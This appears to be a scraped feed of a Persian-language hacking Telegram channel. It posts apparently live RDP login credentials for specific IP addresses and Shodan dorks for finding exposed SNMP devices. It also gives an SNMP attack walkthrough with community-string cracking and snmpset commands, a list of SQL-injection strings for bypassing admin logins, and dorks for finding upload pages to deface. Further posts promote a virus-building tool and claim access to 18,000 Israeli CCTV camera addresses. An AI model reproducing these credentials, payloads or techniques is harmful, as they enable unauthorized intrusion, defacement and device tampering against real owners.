BlackCode | کد سیاه

IP : 84.253.115.142:55338 USER : user1 PASS : 123456 __________________________👾 #free rdp @ir_blackcode

IP : 81.200.30.101:3389 USER : alena PASS : 1q2w3e4R __________________________👾 #free rdp @ir_blackcode

IP : 95.78.164.39:3389 USER : Бух1 PASS : 123QWEasd __________________________👾 #free rdp @ir_blackcode

🔎 دُورک‌های SNMP در Shodan

🎯 پورت‌ها

port:161 port:162

→ پیدا کردن سیستم‌هایی که SNMP باز دارن.

---

🎯 پروتکل / سرویس

"SNMPv1" "SNMPv2" "SNMPv3"

→ فیلتر بر اساس نسخه SNMP.

---

🎯 ترکیب پورت + نسخه

port:161 "SNMPv2" port:161 "SNMPv3" ---

🎯 فیلتر به کشور

port:161 country:IR port:161 country:US ---

🎯 فیلتر به سازمان / ISP

port:161 org:"Cisco" port:161 org:"Huawei" ---

🎯 مثال‌های ترکیبی

port:161 "public" port:161 "private" #دورک #Dork | • بلک کد 💀•| 🔹 @ir_blackcode

آموزش پروتکل SNMP و روش های نفوذ

🔹 SNMP چیست؟

SNMP (Simple Network Management Protocol) پروتکلی در لایه Application است برای مدیریت و مانیتورینگ تجهیزات شبکه (روتر، سوئیچ، سرور...) پورت‌ها: 161 (درخواست/پاسخ) ، 162 (Trap) اجزا: Manager (NMS): نرم‌افزار مدیریت Agent: روی دستگاه نصب است MIB: پایگاه داده شامل OID ها

نسخه‌ها:

v1 و v2c → ناامن (Community String ساده: public, private) v3 → امن (رمزنگاری + احراز هویت) ---

🔹snmp مراحل تست نفوذ

1. شناسایی سرویس nmap -sU -p 161 --script=snmp-info <IP> → گرفتن اطلاعات پایه (OS، اینترفیس‌ها، uptime).

2. cra__ck Community String

onesixtyone -c dict.txt <IP> → تست رشته‌های رایج مثل public و private.

3. استخراج اطلاعات (Enumeration)

snmpwalk -v2c -c public <IP> → نمایش جدول ARP، کاربران، Routing table و …

4. سوءاستفاده از دسترسی (Exploitation)

اگر Community String سطح Read-Write پیدا شود: snmpset -v2c -c private <IP> <OID> type value → امکان تغییر پورت‌ها یا تنظیمات دستگاه. 5. SNMPv3 امن‌تر است، اما اگر رمز ساده باشد قابل Brute Force: snmpwalk -v3 -u admin -a SHA -A pass -x AES -X key <IP> #آموزشی #آموزش پروتکل SNMP | • چنل بلک کد 💀•| 🔹 @ir_blackcode

چطوری فرم های آسیب پذیر برای حمله Blind XSS پیدا کنیم ؟ 🤔 🧐

1. اول وارد وب سایت https://dorkking.blindf.com میشیم ⚡️⌨️ 2. دامنه هدف رو بدون "https://" وارد میکنیم ⚡️🌐 3. رو Next کلیک میکنیم ⚡️ ⚪️ 4. هر 5 تا دورک برای پیدا کردن فرم ها طراحی شدن ⚡️ 😎

#آموزشی | • چنل بلک کد💀•| ⚫️ @ir_blackcode

اقا بلاخره گیت هابمون هم راه اندازی شد🥳 از این به بعد ابزار های خفن تر تو راهه 😈 github : https://github.com/IR-BlackCode

رفقای گل گلاب تا اینجای کار چطوره؟

اگه این پست ری اکشن هاش بالا بره دورک های خفن برای پیدا کردن صفحات لاگین ادمین براتون میزارم👍😈

سلام به همه در رابطه با by pass صفحه لاگین ادمین بعضی از صفحات با بعضی از کلمات کیلیدی by pass میشن لیست کلمات : ' or 1=1 limit 1 -- -+ '="or' or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* =——————————————————-= #blackcode ➡️ @ir_blackcode

ساخت ویروس بدون داشتن دانش برنامه نویسی💀👾 توضیحات : اگه دوست داری خودت ویروس بسازی ولی برنامه نویسی بلد نیستی این ابزار میتونه توی ساختنش بهت کمک کنه و میتونی آپشن هایی که در اختیارت میزاره ویروس بسازی👾👾 #Blackcode @ir_blackcode

❤❤ #BlackCode

سالروز کوروش بزرگ مبارک باد

@ir_blackcode

بیش ۱۸۰۰۰ دوربین مداربسته از سراسر اسرائیل به‌دست آورده‌ایم و ادرس IP آن‌ها را در اختیار شما قرار دادیم #BlackCode @ir_blackcode

Hacker? ◾️@ir_blackcode◾️

Dork

چند تا دورک برای پیدا کردن مسیر های آپلود سایت ها برای دیفیس به کار میاد ذخیره کن به دردت میخوره

inurl:upload filetype:php inurl:file_upload.php inurl:uploadfile inurl:uploadfile site:*.com intitle:"file upload" inurl:upload inurl:/upload.asp intitle:"Select file to upload" inurl:admin inurl:upload inurl:uploadimage inurl:upload.aspx

0☠️0 @ir_blackcode